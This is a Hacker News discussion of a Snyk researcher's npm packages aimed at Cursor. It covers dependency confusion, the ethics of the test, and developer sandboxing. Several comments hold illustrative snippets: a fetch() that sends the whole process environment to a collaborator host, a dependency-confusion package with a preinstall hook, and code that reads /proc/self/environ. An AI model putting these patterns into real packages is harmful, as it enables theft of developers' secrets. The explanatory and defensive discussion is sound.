
Snyk security researcher deploys malicious NPM packages targeting cursor.com

n2d4

[EDIT: See the response by a Cursor dev below — looks like it was not authorized by them]

Sounds to me like Cursor internally has a private NPM registry with those packages. Because of how NPM works, it's quite easy to trick it into fetching the packages from the public registry instead, which could be used by an attacker [0].

Presumably, this Snyk employee either found or suspected that some part of Cursor's build is misconfigured as above, and uploaded those packages as a PoC. (Given the package description "for Cursor", I'd think they were hired for this purpose.)

If that's the case, then there's not much to see here. The security researcher couldn't have used a private NPM registry to perform the POC if the point is to demonstrate a misconfiguration which skips the private registry.

.

[0] In particular, many proxies will choose the public over the private registry if the latest package version is higher: https://snyk.io/blog/detect-prevent-dependency-confusion-att...
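
To illustrate the mechanics: a dependency-confusion PoC package is usually tiny. A minimal sketch (all names and the version are made up; the inflated version number is what wins in a misconfigured proxy, and the install hook is what runs code on the victim's machine):

  // package.json of a hypothetical confusable package (shown as a comment):
  // {
  //   "name": "some-internal-package",   // same name as the private package
  //   "version": "99.99.99",             // higher than any private release
  //   "scripts": { "preinstall": "node index.js" }
  // }

  // index.js, run automatically by npm via the preinstall hook:
  console.log('dependency-confusion PoC: executed at install time');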

ArVID220u

cursor dev here. reasonable assumptions, but not quite the case. the snyk packages are just the names of our bundled extensions, which we never package nor upload to any registry. (we do it just like how VS Code does it: https://github.com/microsoft/vscode/tree/main/extensions)

we did not hire snyk, but we reached out to them after seeing this and they apologized. we did not get any confirmation of what exactly they were trying to do here (but i think your explanation that someone there suspected a dependency confusion vulnerability is plausible. though it's pretty irresponsible imo to do that on public npm and actually sending up the env variables)

nomilk

> "pretty irresponsible"

Wouldn't it be more like "pretty illegal"? They could have simply used body: JSON.stringify("worked"), i.e. not sent target machines’ actual environment variables, including keys.
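
Roughly, as a sketch of the difference (hypothetical collaborator URL; assumes Node 18+, where fetch is a global):

  // What the packages reportedly did: exfiltrate the entire environment.
  fetch('https://example.oastify.com/collect', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(process.env), // every secret in env goes upstream
  });

  // A beacon that proves execution without taking anything:
  fetch('https://example.oastify.com/collect', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify('worked'),
  });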

reubenmorais

It's an unfortunate incentive structure. If you're doing offensive security research, there are two ways you can go about it: you can report the potential vulnerability without exploiting it, in which case you risk the company coming back to you and saying "thanks, but we don't consider this a vulnerability because it's only exploited through misconfiguration and we're too smart for that". Maybe you get some token reward of $50.

Or you can exploit it and say here's the PoC, this many people at your company fell for it, and this is some of the valuable data I got, including some tokens you'll have to rotate. This puts you into actual bug bounty territory. Certainly the PR side of things alone will incentivize them to pay you so you don't make too much noise about how Cursor leaked a bunch of credentials due to a misconfiguration that surely every good programmer knows about and defends against (so many vulnerabilities seem dumb in hindsight).


DigitalNoumena

It may interest you that Guy Podjarny, one of the Snyk founders, now has an AI coding company (https://www.tessl.io/about) that looks like a competitor of yours

IAmGraydon

[flagged]

not_a_bot_4sho

It was a thing back in the late 90s. I still do it in casual conversations with friends, less so in professional settings.

It's a gen X thing, like using "lol" to mean literal laughter

johnny22

it's been a thing on irc for at least 20 years. i've been used to it for a long time.

dovin

I like to call it informal case.

furyofantares

When I grew up online in the 90s, on IRC, AOL/AIM, ICQ and web forums, it was extremely common. Most of the people I know from then still do it, and I still do it with them and in many other places, although for whatever reason I don't do it here. Though it's 50/50 when they're on their phones, now that phones auto-capitalize by default.

urig

Rules are put in place to be followed, for a reason. Capital letters at the start of the sentence increase readability. People who don't bother with them are being inconsiderate towards their readers.

pizza

yes but there could be many possible reasons, for instance

- it's muuch faster on mobile

- you're aiming to convey litheness to potential target audiences who will know to recognize it as intentional litheness

- you've gotten used to minimizing the amount of keystrokes necessary for communicating things, to the point it's second nature

- you've worked a lot in the past with older nlp systems, where ignoring capitalization was a given for inputs anyhow, and just got used to treating it as syntactic cruft only strictly necessary in more formal settings ;)

Piisamirotta

I have been thinking of this too. I find it super annoying to read and it looks unprofessional.

demarq

how does this bother you, what greater meaning does it have?

syndicatedjelly

[flagged]

benatkin

Yeah, I strongly disagree with the way it's characterized here.

arkadiyt

> If that's the case, then there's not much to see here

They could have demonstrated the POC without sending data about the installing host, including all your environment variables, upstream. That seems like crossing the line

nomilk

> If that's the case, then there's not much to see here.

Allowing someone full access to the contents of your environment (i.e. the output of the env command) is a big deal to most, I suspect.

LtWorf

If /proc is mounted you can read all of that.
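
For example, a minimal sketch in Node (Linux only; /proc/<pid>/environ is typically readable for processes running as your own user, or all of them as root):

  // Entries in /proc/self/environ are NUL-separated KEY=value pairs.
  const { readFileSync } = require('node:fs');

  const env = readFileSync('/proc/self/environ', 'utf8')
    .split('\0')
    .filter(Boolean);
  console.log(env);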

rdegges

Hey there! I run DevRel & SecRel @ Snyk, we just published a piece to help dispel all the rumors, etc. This provides a lot of in-depth info on the situation: https://snyk.io/blog/snyk-security-labs-testing-update-curso...

BeefWellington

This response doesn't make a lot of sense.

What's the justification for taking all of the environment variables? This post tries to paper over that particular problem. If your goal was to see if you could attack the dependency chain, sending just username+hostname would have been sufficient to prove your case.

Taking the environment variables is about taking the secrets, and it kind of moves this from PoC to supply chain attack on the opposition. Not to mention it's not only Cursor devs that would be affected by this; it could have (if your plan worked) attacked anyone using the extensions.

It's also a tough buy given the note about the Snyk cofounder moving to compete directly with Cursor (courtesy @tankster): https://techcrunch.com/2024/11/14/tessl-raises-125m-at-at-50...

Assuming truly innocent motivations, you guys still need to give your heads a shake and rethink your approaches here.

bangaladore

Frankly, I wouldn't be surprised if this was a case of Hanlon's razor. Some "researcher" thought "well, env vars will certainly show us what we want", and that's where the conversation ended, without thinking a little harder about what else might be in those vars.

neonerosion

The few details given in this response don't match up with what happened.

Who did the GDPR review before extracting env vars from systems that were not under your control? How did actively extracting potentially private data from the environment not get flagged as Unauthorized Access?

If this "experiment" (which happened to be against a competitor, mind) was reviewed and approved internally, that is a great demonstration of Snyk's approach to (ir)responsible data collection and disclosure.

NitpickLawyer

Wasn't this supposed to be fixed in NPM? I remember a talk by the researcher behind portswigger (sorry, blanking on his name) doing this a while back, with great success (Apple, MS, Meta; basically all of FAANG were vulnerable at that time).

tankster

Also, interestingly, the Snyk cofounder has started a competitor to Cursor: https://www.tessl.io/ https://techcrunch.com/2024/11/14/tessl-raises-125m-at-at-50...

I hope there is no foul play.

guappa

Given how all my interactions with them have been extremely negative (see my other comment), I think it's rather likely that there is foul play.

3eb7988a1663

I need to get serious about doing all development inside a virtual machine. One project per VM. There are just too many insidious ways in which I can ignorantly slip up such that I compromise my security. My only solace is that I am a nobody without secrets or a fortune to steal.

IDEs, plugins, development utilities, language libraries, OS packages, etc. So much code that I take on blind faith.

redserk

Vagrant’s popularity seems to have died down with Docker containers but it’s by far my favorite way to make dev environments.

Several years ago I worked somewhere that prohibited web browsers and development tools on laptops. If you needed to use a browser, you’d have to use one over Citrix. If you needed to code, you’d use a VDI or run the tools in a VM.

At the time I thought their approach was clinically insane, but I’m slowly starting to appreciate it.

arcanemachiner

I still like Vagrant. But I believe it's yet another victim of the Hashicorp license change debacle from a year or two ago.

Unlike with Terraform/OpenBao, I know of no community effort to keep the open-source version of this project alive. The latest open source version is still available in the Ubuntu repo, but who knows how long it will work until some form of bit rot occurs.

pizza234

> I still like Vagrant. But I believe it's yet another victim of the Hashicorp license change debacle from a year or two ago.

The license change is irrelevant - from the licensing page:

> All non-production uses are permitted.

Devs who use Vagrant in a development environment can do it as they used to do it before.

> The latest open source version is still available in the Ubuntu repo, but who knows how long it will work until some form of bit rot occurs.

Hashicorp products have always been intended to be downloaded from the website, since they're statically linked binaries (I don't like that they're huge, but as a matter of fact, they make distribution trivial).

fancyswimtime

more so a victim of speed

tacticus

This is the practice in many government sites these days.

Except the VM is some old Windows version without any tools on it, and no shell access.

You can't actually do anything useful on there at all.

VDI systems could work if implemented properly, but that's the last thing a security team actually wants to do.

dacryn

VDI is actually preferred by our security teams, because they have complete deep packet inspection on literally all traffic going in and out.

On our laptops, there are still some flows that avoid the VPN, etc.

pmontra

A customer of mine still uses vagrant on a project, for local development. That project started in 2016. We are developing on a mix of Linux, Mac, Windows and it's not as straightforward as it could be. Linux is easier, Windows is messier.

A newer project fires up VMs from a Python script that calls an adapter for EC2 (with the boto library) when run on AWS, and for VirtualBox (by calling VBoxManage) when running locally. That allows us to simulate EC2 locally: it's a project that has to deal with many long jobs, so we start VMs for them and terminate the VMs when the jobs are done. That also runs better on our mix of development systems. WSL2 helped to ease the pains of developing on Windows. We call the native Windows VirtualBox, not the one we could have installed inside WSL2, but we keep most of the code that runs on Linux.

hresvelgr

Devcontainers[1] are the new incarnation of this pattern. We use them at work and they are a dream for onboarding new developers. The only downside is the VSCode lock-in but if that's a concern there's always DevPod[2].

[1] https://containers.dev/

[2] https://devpod.sh/

bluehatbrit

It looks like the team behind it have been moving it towards more of an open standard over the last year. There's now a CLI reference implementation, and the JetBrains IDEs have an implementation of it.

There's also a thread for Zed about a path to implementing it there [0]. Hopefully it'll become a bit more common over 2025.

[0] - https://github.com/zed-industries/zed/issues/11473

roland35

I think VS Code is the easiest way to set up dev containers, but once they are created I mostly just shell into them and use neovim!

spike021

At my first job almost 10 years ago we had the concept of "X-in-a-box" using Vagrant + VMs and I miss that pattern so much ever since (multiple job skips later).

None of my jobs since have had any semblance of a better way to set up a local dev environment easily.

It was just way easier to encapsulate services or other things in a quickly reproducible state.

I digress..

jsjohnst

> At the time I thought their approach was clinically insane

Let’s be clear, it’s still clinically insane, even if marginally rationalized.

flyinghamster

I started using Ansible a few years back to set up VMs (or Raspberry Pis) with a consistent environment. Once I wrapped my head around it, I've found it very nice for any situation where I need to treat systems as livestock rather than pets.

bloopernova

I use Ansible in local only mode to install/configure macOS as a development environment.

Works well with Homebrew, and copies all the config files that devs often don't set up.

buildbot

Vagrant is still kicking! But yeah not as popular as back in 2014-2016?

A hybrid(?) alternative is enroot, which is pretty neat IMO, it converts a docker container into a squashfs file that can be mounted rw or used in an ephemeral way. https://github.com/NVIDIA/enroot

XorNot

The real problem is video performance in VMs. It still just... kind of sucks. Getting GL acceleration working properly for something like Cinnamon in a VM is just about impossible.

Nvidia gates its virtualized GPU offerings behind their enterprise cards, so we're left with ineffective command translation.

IMO: I can tolerate just about every other type of VM overhead, but choppy/unresponsive GUIs have a surprisingly bad ergonomic effect (and somehow leak into the performance of everything else).

If we could get that fixed, at least amongst Linux-on-Linux virtualization, I think virtualizing everything would be a much more tenable option.

alias_neo

There are ways around it. There is a community of people who use Nvidia enterprise cards with vGPU for gaming, and performance is excellent; or you can PCI-passthrough an entire GPU.

If you can't do that because it's for company/corporate purposes then I can sympathise with not wanting to pay Nvidia's prices.

z3t4

You can get good security without virtualization, for example SELinux and namespaces on Linux, jails on BSD, and zones on Solaris. We would have many viable and competing solutions if it weren't for Microsoft's monopoly.

danieldk

But would it matter much for development? Either SSH into the VM and use vi/emacs or use an IDE/editor with remote support. VS Code even lets you use a container as a development environment (I know, not a VM by default):

https://code.visualstudio.com/docs/devcontainers/containers

dsissitka

I don't know about VS Code's dev containers extension but the SSH extension's README says:

> Using Remote-SSH opens a connection between your local machine and the remote. Only use Remote-SSH to connect to secure remote machines that you trust and that are owned by a party whom you trust. A compromised remote could use the VS Code Remote connection to execute code on your local machine.

https://marketplace.visualstudio.com/items?itemName=ms-vscod...

If you're worried about extensions there's also:

> When a user installs an extension, VS Code automatically installs it to the correct location based on its kind. If an extension can run as either kind, VS Code will attempt to choose the optimal one for the situation;

https://code.visualstudio.com/api/advanced-topics/remote-ext...

whitehexagon

It's horrible that trust is being eroded so much, and seeing monthly GB updates to my OS doesn't reassure me at all. I like the idea of having a stable isolated VM for each project. Are there standard open-source tools to do this?

Specifically I'm transitioning my Go and Zig development environments from an old mac to an M1 with Asahi Linux and getting a bit lost even finding replacements for TrueCrypt and Little Snitch. Do these VM tools support encrypted VMs with firewall rules? I saw Vagrant mentioned here and that sounds like it might cover the network isolation, but what else would you suggest?

pritambaral

I run all my dev environments under LXD. Even the IDE: full graphical Emacs (or Vim) over X11 forwarding over SSH. Host is Wayland, so security concerns with X are handled. WayPipe also works, but is jankier than X, probably because X, unlike Wayland, was designed for network transparency.

LXD, unlike Docker, doesn't play fast-and-loose with security. It runs rootless by default, and I don't allow non-root access to the LXD socket on host. Each container is a full userspace, so it's much more convenient to configure and use than Dockerfiles.

SSH from a container to a remote works transparently because I forward my SSH Agent. This is secure because my agent confirms each signing request with a GUI popup (on host).

3eb7988a1663

Can you point to a write-up somewhere that details this setup?

Part of the appeal of VMs is that they were built with security as a primary objective. I probably have to do something stupid to break that isolation. A custom ad hoc configuration makes me a bit nervous that I will unknowingly punch a Docker-sized hole through my firewall and have less security than if I ran a stock workflow.

stevage

I always used to do that, using Vagrant. Mostly because it was the only practical way to maintain independent environments for the tools I was using.

These days I work in JavaScript and rarely have issues with project environments interfering with each other. I've gotten lazy and don't use VMs anymore.

In theory Docker-type setups could work, but they just seem like so much effort to learn and set up.

smatija

Seconding Vagrant - especially because it's the only reasonable way I've found so far to test Linux releases on my Windows rig (would prefer to dev on Linux, but a Windows-only company is a Windows-only company).

Basically I put a Vagrantfile in the src folder, then run docker compose with db, caddy, app server and other services inside it - then I forward ports 80 and 443 from the VM and use localhost.whateverdomain.igot with a self-signed cert on caddy (since https is just different enough from http that I otherwise get bitten by bugs every so often).

When I start a new project I can usually just copy the Vagrantfile with minimal changes.

weinzierl

I know where you are coming from and I considered this myself again and again. For me and for now it is not something I want to do and not primarily because of the effort.

The VM might protect me, but it will not protect the users of the software I am producing. How can I ship a product to the customer and expect them to safely use it without protection when I myself only touch it when in a hazmat suit?

No, that is not the environment I want.

My current solution is to be super picky with my dependencies. More specifically, I hold the opinion that we should neither trust projects nor companies, but only people. This is not easy to do, but I do not see a better alternative for now.

mjl-

i develop on linux, on various projects. i'm mostly concerned with all the tools, build scripts and tests that may read sensitive data, or accidentally destroy data. so i'm limiting access to files when working on a project with linux namespaces, using bubblewrap.

i've got a simple per-project dot file that describes the file system binds. while i'm working on a project, new terminals i open are automatically isolated to that project based on that dot file. it has very low (cognitive) overhead and integrates pretty much seamlessly. i suspect many developers have similar scripts. i looked for projects that did this some time ago, but couldn't find it. either because it's too simple to make a project about, or because i don't know how others would describe it. if anyone has pointers...

i don't limit network access (though i did experiment with logging all traffic, and automatically setting up a mitm proxy for all traffic; it wasn't convenient enough to use as regular user). there is still a whole kernel attack surface of course. though i'm mostly concerned about files being read/destroyed.

arkh

Time to main Qubes OS on your development machine. https://www.qubes-os.org/

3eb7988a1663

I actually did try to install Qubes over the holiday, but I repeatedly encountered installation failures and could not ever login to the system. Someone had posted an identical issue, but they were similarly stymied. I should revisit, but my initial foray tells me I am going to have to withstand quite a few papercuts in order to get the isolation I want.

sim7c00

never had issues with qubes like that but i did pick something tested (hw). u can check hardware compat list. it has also some good links to forums for specific hw related tweaks u might need. that being said, running qubes fully and working with it is something else... i decided i am uninteresting enough just to use ubuntu these days :p... maybe sometime ill have the patience again.

technion

I think a lot of the issue in this particular example is the ease with which API keys, once leaked, act as single-factor passwords.

If you ran a keylogger on my machine you would never get into any major site with MFA. You couldn't watch me log on to the Azure console with a passkey and do much with it. But if you scrape a saved key with publish abilities, bad things happen.

chrismarlow9

What's to stop me from installing custom certs and MITMing your login session, proxying the info? Or an extension harvesting the data after you log in? I'm pretty sure if I have root it's game over one way or another. The surface is massive.

technion

At that point you've done something much more invasive and detectable than exporting a .env file, and you've walked away with a very short-lived token. There's always "something more an attacker can do"; I'll stand by the view that requiring further authentication to perform interactive actions and pushes is worthwhile.

dacryn

I wonder how this is mitigated by my current workflow of running jupyter and vscode from a docker container.

I did not start doing this because of security, but just to get something more or less self managed without any possibility to break different projects. I am tired of my team spending too much time on extensions, versions, packages, ...

Docker compose files have saved our team many hours, even if it's extremely wasteful to have multiple vscode instances running alongside each other

gortok

The only part of the article I disagree with is this line:

> But in general, it’s a good idea not to install NPM packages blindly. If you know what to look for, there are definite signals that these packages are dodgy. All of these packages have just two files: package.json and index.js (or main.js). This is one of several flags that you can use to determine if a package is legit or not.

This works, maybe, for top-level packages. But it's nearly impossible to vet every transitive dependency.

If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area? https://gist.github.com/anvaka/8e8fa57c7ee1350e3491#top-1000...
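
One thing that does scale is automating the cheap signals. A rough sketch (heuristic only) that walks node_modules and lists every installed package declaring an install-time hook, which is the capability this attack relied on:

  // Flag packages with npm lifecycle hooks that run code at install time.
  const fs = require('node:fs');
  const path = require('node:path');

  const HOOKS = ['preinstall', 'install', 'postinstall'];

  function* manifests(dir) {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      if (!entry.isDirectory()) continue;
      const pkgDir = path.join(dir, entry.name);
      // Scoped dirs (@scope) contain package dirs one level down.
      if (entry.name.startsWith('@')) { yield* manifests(pkgDir); continue; }
      const manifest = path.join(pkgDir, 'package.json');
      if (fs.existsSync(manifest)) yield manifest;
      const nested = path.join(pkgDir, 'node_modules');
      if (fs.existsSync(nested)) yield* manifests(nested);
    }
  }

  for (const file of manifests('node_modules')) {
    const pkg = JSON.parse(fs.readFileSync(file, 'utf8'));
    const hooks = HOOKS.filter((h) => pkg.scripts && pkg.scripts[h]);
    if (hooks.length) console.log(`${pkg.name}: ${hooks.join(', ')}`);
  }

npm also has a blunt built-in version of this: installing with --ignore-scripts (or ignore-scripts=true in .npmrc) disables lifecycle scripts entirely.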

ziddoap

>If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area?

This would be where different security advice would apply: don't pull in a package that has 400 dependencies.

krainboltgreene

Given the nature of software development and software developers, especially given that American companies value shareholder profits over programmer productivity, this is effectively "You don't need to get vaccines, simply don't get sick from other people."

wyldberry

Things like this are supposed to be the province of an organization's security engineering teams, helping to ensure you don't ship something like this. It's also hard for them, because no one wants to force developers to re-implement already-solved functionality.

nightpool

Out of curiosity, I've always meant to ask, are you related to the famous Geoguesser content creator in any way? It's a pretty distinctive last name.

XorNot

This is really where SELinux had the right idea overall: preclassifying files with data about their sensitivity, and denying access based on that, does adequately solve this problem (i.e. keeping npm installations away from id_rsa).

beardedwizard

The issue with SELinux is usability. A company called Intrinsic tried a similar "allowlist" approach to JavaScript, based on the assumption that you could never control this sprawl and had to assume every package was malicious. I never saw the technology take off, because generating the allowlist was of course error-prone.

I'm not sure what has to change in UX to make these approaches more palatable, but if you have to frequently allow 'good' behaviors, my experience is it never takes off.

__MatrixMan__

I think we need to focus on empirical consensus rather than taking as authoritative some file which makes claims about what a particular piece of software will or won't do.

So before running any code you'd hash it and ask your peers: "what do we think this does?"

If it does something surprising, you roll back its effects (or maybe it was in a sandbox in the first place) and you update your peers so that next time they're not surprised.

I keep saying "you" but this would just be part of calling a function, handled by a tool and only surfaced to the user when they ask or when the surprising thing happens.

It could be a useful dataset both for maintainers and for people who want to better understand how to use the thing.
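
A sketch of just the lookup half of that idea (the peer endpoint and the response shape are entirely made up):

  const crypto = require('node:crypto');
  const fs = require('node:fs');

  // Identify the artifact by content, not by name or version claims.
  async function whatDoWeThinkThisDoes(tarballPath) {
    const digest = crypto.createHash('sha256')
      .update(fs.readFileSync(tarballPath))
      .digest('hex');
    // Ask a hypothetical consensus service keyed by the exact hash.
    const res = await fetch(`https://peers.example/behavior/${digest}`);
    return res.json(); // e.g. { observed: ['reads ~/.npmrc'], surprises: [] }
  }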

chamomeal

Wait how in the world does a React carousel component have over 400 deps…

tristor

Because Javascript is a drug that makes developers stupid.

It's almost trite at this point to comment on the obsession Node has created among developers with reducing functionality to the smallest possible reusable parts, even trivial things, publishing them as packages, and then importing and using those dependencies. The idea, in and of itself, is not terrible, but it's been taken to a logical extreme which is very much the definition of terrible.

jbreckmckye

Nearly all of these look like demo projects. You're making inferences about an entire group of developers based on a meme plus a search over the very 'worst' offenders.

jbreckmckye

Do you mean https://www.npmjs.com/package/carousel-react? By the looks of it, this was published by someone 7 years ago as part of a personal project. Nothing uses it.

Going through that list... they all look like personal projects, with no dependents, and a single release by a single person.

chamomeal

Ok now that I’ve actually looked at the package.json, it seems like this must be a joke or something. It’s got packages for CLI arg parsing, math expression evaluation, hashing, etc.

When I’m back on my computer I may look at the source and confirm my suspicion that none of those are required for the carousel functionality lol

cloverich

History of "micro dependencies" where many flexible utilities are split up into separate packages, such that many npm dependencies are a single function (ie rather than a package exporting ten methods, its ten separate dependencies).

Then because there is no standard library, many reinventions of similar but incompatible utilities. etc.

KuhlMensch

/giphy "first time?" meme

Sohcahtoa82

Did you think the meme about node_modules having more gravity than a star was just a meme?

It's very much based on reality. The npm ecosystem is just absolutely fucked.

loaph

> If you're pulling in a package that has 400 dependencies, how the heck would you even competently check 10% of that surface area?

At my place of work we use this great security too called Snyk. Definitely check it out

/s

guappa

snyk is the same company that instead of rotating public keys just… changes them without notice. https://github.com/snyk/cli/pull/5649

They also mark projects as "abandoned" if they move to any other forge that isn't github. And they stay abandoned even if new releases appear on npm/pypi :D

Their competence isn't as big as their fame, in my opinion.

Also one of their sales people insulted me over email, because apparently not being interested in buying their product means you're an incompetent developer who can only write software filled with vulnerabilities.

azemetre

They also penalize libraries that are "done," and require minimal development.

Completely backwards software that corpos only seem to buy because their insurers force them to check off some security list box.

gyoridavid

"insulted me over email" - whoa, that's wild, do you still have the email? would be fun to see it :D

guappa

Sorry, I searched, it seems all my emails from before the last company rename are gone.

edit: or microsoft outlook sucks… I tried to sort in reverse my inbox to see what's the oldest email there and "the request cannot be satisfied"

unixhero

Ouch, I kind of trusted it.

... more than Gmail and Google

ceejayoz

I get surprisingly many cold emails these days with a passive aggressive “shall we schedule a call, or are you a bad person who doesn’t give a shit about security?” approach.

matwood

Yeah. Or 'make this change to help our processes'. Um, that's not my job.

alp1n3_eth

That's extremely unfortunate, especially about the "abandoned" labelling. I've been looking to move off GitHub recently as well; it feels like it's got a bit too much control.

Codeberg looks interesting, and there are self-hosted ones like Forgejo that also look great if you're okay with the maintenance.

guappa

I use codeberg :)

It has CI, pull requests, issues and whatnot. It also doesn't force you to use 2fa if you don't want :D

If you do corporate open source though, you're stuck on github because snyk, openssf, pypi and whatnot only interface with github.

For actual libre software codeberg is very good.

Keep in mind that debian salsa is open to everyone as well. The only annoyance is that non debian developers have a "-guest" suffix. But it's ok to use for projects that aren't debian specific.

bilekas

> They also mark projects as "abandoned" if they move to any other forge that isn't github. And they stay abandoned even if new releases appear on npm/pypi :D

Well there's a sign of a good team... /s

That's actually an interesting take; I haven't heard too much about them, except that they do have an ego.

Ylpertnodi

I'm sure you can provide the [appropriately redacted] body of said email?

guappa

I was also sure until I found out that outlook refuses to search old emails.

throw16180339

There's an additional hoop to jump through for Outlook to actually search your whole inbox. Here are the steps (https://answers.microsoft.com/en-us/outlook_com/forum/all/ou...)

woodruffw

Without more context, this doesn't look great for Snyk either way: either they have an employee using NPM to live test their own services, or they have insufficient controls/processes for performing a legitimate audit of Cursor without using public resources.

tru3_power

Why not? NPM behaves oddly when there is a public package named the same as one in a private repo; in some cases it'll fetch the public one instead. I believe it's called package squatting or something. They might have just been showing that this is possible during an assessment. No harm no foul here imo

woodruffw

> They might have just been showing that this is possible during an assessment. No harm no foul here imo

You're not supposed to leave public artifacts or test on public services during an assessment.

It's possible Cursor asked them to do so, but there's no public indication of this either. That's why I qualified my original comment. However, even if they did ask them to, it's typically not appropriate to use a separate unrelated public service (NPM) to perform the demo.

Source: I've done a handful of security assessments of public packaging indices.

guappa

Comments here seem to indicate that cursor did NOT ask them to (unless of course someone inside the company did and didn't tell the others)

compootr

if Cursor is secure it shouldn't be a problem for them! (and, according to their comments, it is)

BeefWellington

"No Harm No Foul" in this case would be a simple demonstrative failure case, not functioning malware.

nikcub

Looks like a white hat audit from Snyk testing. Got flagged because oastify.com is a default Burp Collaborator server.

They should be running a private npm repo for tests (not difficult to override locally) and also their own collaborator server.

Cthulhu_

It's not white hat, because they actively extract data; if it was just to prove it worked they could've done a console.log, caused npm install to fail, or not extracted a payload.

that_guy_iain

The data they extract is nothing sensitive, and this way they can see how many hits they get. The more people affected, the bigger the headline for them.

__jonas

In what world is "all environment variables" nothing sensitive?

mirkodrummer

Looks like NPM is generating jobs for those in the security field. It's an unfixable mess; I really hope some competition like JSR will put enough pressure on the organization.

devjab

It's not just NPM; it's the trust in third-party libraries in general. Even though it's much rarer, you'll see exploits on platforms like NuGet. You're also going to see them on JSR. You have more security because packages are immutable, but you're not protected from downloading a malicious package before it's outed.

I think what we're more likely to see is that legislation like DORA and NSIS will increasingly require you to audit third-party packages, enforcing a different way of doing development in critical industries. I also think you're going to see a lot less usage of external packages in the age of LLMs. Because why would you pull an external package to generate something like your OpenAPI specification when any LLM can write a CLI script that does it for you in an hour or two of configuring it to your needs? Similarly, you don't need to use LLMs directly to auto-generate "boring" parts of your code; you can have them build CLI tools which do it. That way you're not relying on outside factors, and while I can almost guarantee that these CLI tools will be horrible cowboy code, their output will be what you refine the tools to make.

With languages like Go pushing everything you need into their standard packages, you're looking at a world where you can do a lot of things with nothing but the standard library very easily.

guappa

I think NPM makes it worse because it's common to have hundreds or thousands of dependencies, which makes it easier to hide a malicious one in there.

rettichschnidi

OT: Has anyone ever gotten (proper) SBOMs for Snyk's own tools and services? Asking because they want to sell my employer their solution (which does SBOMs).

KennyBlanken

Snyk is founded by people from the Israeli Army's Unit 8200.

I wouldn't install it if you paid me to, because it feels a lot like Unit 8200 pumps out entrepreneurs and funds them so that (like the NSA) they have their foot already in the door.

alpb

Wiz.io (which almost sold to Google for $25bn) also had founders from IDF Unit 8200. Dozens of other companies, like Waze and Palo Alto Networks, were the same.


woodruffw

Conspiracies and politics aside, the reasons for the prominence of 8200 are somewhat boring: it's the largest unit in the IDF, in a relatively small country. Teenagers who demonstrate just about any degree of technical savviness get funneled into it for their mandatory service.

It's the equivalent of observing that SFBA startups tend to have a lot of Stanford grads at the helm.

(I don't have any particular love for Snyk as a product suite. I think most supply chain security products are severely over-hyped.)

ignoramous

> Conspiracies

Not when the dissidents put their name to paper.

  We, veterans of Unit 8200, reserve soldiers both past and present, declare that we refuse to take part in actions against Palestinians and refuse to continue serving as tools in deepening the military control over the Occupied Territories.

  It is commonly thought that the service in military intelligence is free of moral dilemmas and solely contributes to the reduction of violence and harm to innocent people. However, our military service has taught us that intelligence is an integral part of Israel's military occupation over the territories.

  The Palestinian population under military rule is completely exposed to espionage and surveillance by Israeli intelligence. While there are severe limitations on the surveillance of Israeli citizens, the Palestinians are not afforded this protection.

  There's no distinction between Palestinians who are, and are not, involved in violence. Information that is collected and stored harms innocent people. It is used for political persecution and to create divisions within Palestinian society by recruiting collaborators and driving parts of Palestinian society against itself. In many cases, intelligence prevents defendants from receiving a fair trial in military courts, as the evidence against them is not revealed.

  Intelligence allows for the continued control over millions of people through thorough and intrusive supervision and invasion of most areas of life. This does not allow for people to lead normal lives, and fuels more violence further distancing us from the end of the conflict.
https://www.theguardian.com/world/2014/sep/12/israeli-intell... (and that's from 2014)

manquer

Talent or skills are essential but alone are not enough. While the size and quality of the talent pool helps, it is not sufficient to explain the success rate: many countries have similar or better talent pools that are larger, but they don't have the success rates that Israeli startups, and 8200 ones specifically, have relative to their home market and talent pool size.

It is not some conspiracy either: success as a founder has strong network effects and positive feedback loops. The right mentorship, access to a talent pool, access to funding, and people who can open doors all become easier when your network already has some success. It's the same reason second-time founders have it easier: they can tap into their personal version of such a network.

It is not unusual to Israel/8200, the valley itself benefits from this effect heavily after all.

sgammon

Incredibuild is on this list (at least with regard to current leadership)

de130W

Got better results with Syft

davedx

Lots of false positives IME

Sohcahtoa82

That wasn't my experience when I used Snyk at my last job, depending on your definition of FP.

For example, if you're using a multi-protocol networking library, and it says that the version you have installed has a vulnerability in its SMTP handling, but you don't use the SMTP functionality, is that a FP?

I'd argue that it's irrelevant, but not a false positive.

I never had it get the version of a library wrong.

dannyallan

Snyk Research Labs regularly contributes back to the community with testing and research of common software packages. This particular research into Cursor was not intended to be malicious, and the packages included the Snyk Research Labs name and the contact information of the researcher. We were very specifically looking at dependency confusion in some VS Code extensions. The packages would not be installed directly by a developer.

Snyk does follow a responsible disclosure policy and while no one picked this package up, had anyone done so, we would have immediately followed up with them.

luma

Spraying your attack into the public with hopes of hitting your target is the polar opposite of responsible. The only "good" part of this is that you were caught in the act before anyone else got hit in the crossfire.

In response, you suggest that you'll send a letter of apology to the funeral home of anyone that got hit. Compromising their credentials, even if you have "good intentions", still puts them into a compromised position and they have to react the same as they would for any other malevolent attacker.

This is so close to "malicious" that it's hard to perceive a difference.

edit: Let's also remind everyone that a Snyk stakeholder is currently attempting to launch a Cursor competitor, so assuming good intentions is even MORE of a stretch.

senorrib

Cool. Why phone home the user's environment, then? The vulnerability could very much be confirmed by simply sending a stub instead of live envs.

yabones

This is grey-hat at best. Intent may have been good, but the fact is that this team created and distributed software to access and exfiltrate data without permission, which is very illegal. You may want to consult with the legal department before posting about this on a public forum, fyi.

etyp

Seems reasonable enough, but why would it (allegedly) send environment variables back via a POST? Even if it's entirely in good faith, I'd rather some random package not have my `env` output..

austinkhale

Upvoting this since presumably you're actually the CTO at Snyk and people should see your official response, but wow this feels wildly irresponsible. You could have proved the PoC without actually stealing innocent developer credentials. Furthermore, additional caution should have been taken given the conflict of interest with the competitor product to Cursor. Terrible decision making and terrible response.

pizzalife

What is responsible about sending the environment over in a proof of concept?


lopkeny12ko

Why, after all these years, are we still doing this stupid thing of using a global namespace for packages? If you are a company with an internal package registry just publish all your packages as @companyname/mylib and then no one can squat the name on a public registry. I thought we collectively learned this 4 years ago when dependency confusion attacks were first disclosed.
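
A minimal sketch of what that looks like (names and registry URL are made up):

  // package.json: a scoped name can't be squatted on the public registry,
  // because publishing under @companyname requires membership in that org.
  {
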